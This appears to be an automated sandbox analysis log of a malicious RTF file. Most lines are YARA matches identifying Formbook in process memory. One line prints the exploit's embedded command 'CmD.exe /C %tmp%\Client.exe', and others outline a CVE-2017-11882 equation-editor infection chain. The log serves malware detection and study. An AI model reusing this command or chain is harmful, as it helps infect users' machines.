          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPED | Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr | Stream path '_1721489049/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
          Source: Client.exe.0.dr | Static PE information: section name: 5++.8$
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe
          Source: Client.exe.0.dr | Static PE information: section name:
          Source: Client.exe | Static RTF information: Object: 0 Offset: 000012A7h Client.exe
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00321338
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_003236C0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00324B61
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00322078
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0032A100
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00324B70
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00329BD8
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004A7928
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0087BA28
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00870AAB
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00870048
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00878478
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0087B188
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0087B508
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0087B348
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02400048
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00401030
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041E0B9
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00402D87
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00402D90
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00409E60
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041EE1B
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041D688
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00402FB0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AAE0C6
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00ADD005
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B2D06D
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AB3040
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AC905A
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AAE2E9
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B51238
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B563BF
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AAF3CF
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AD63DB
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AB2305
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AFA37B
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AB7353
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AC1489
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AE5485
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B3443E
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AED47D
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B305E3
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00ACC5F0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AB351F
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AF6540
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AB4680
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00ABE6C1
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B52622
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AFA634
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00ABC7BC
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B3579A
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AE57C3
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B4F8EE
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B2F8C4
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AD286D
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00ABC85C
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AB29B2
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B5098E
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AC69FE
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B35955
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B3394B
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B63A83
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B5CBA49_2_00B5CBA4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3DBDA9_2_00B3DBDA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AD7B009_2_00AD7B00
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4FDDD9_2_00B4FDDD
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE0D3B9_2_00AE0D3B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABCD5B9_2_00ABCD5B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE2E2F9_2_00AE2E2F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ACEE4C9_2_00ACEE4C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4CFB19_2_00B4CFB1
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B22FDC9_2_00B22FDC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC0F3F9_2_00AC0F3F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ADDF7C9_2_00ADDF7C
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\user\AppData\Local\Temp\Client.exe; Section loaded: amsi.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Memory allocated: 77620000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Memory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exe; Memory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exe; Memory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exe; Memory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exe; Memory allocated: 77740000 page execute and read and write
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE; Matched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE; Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
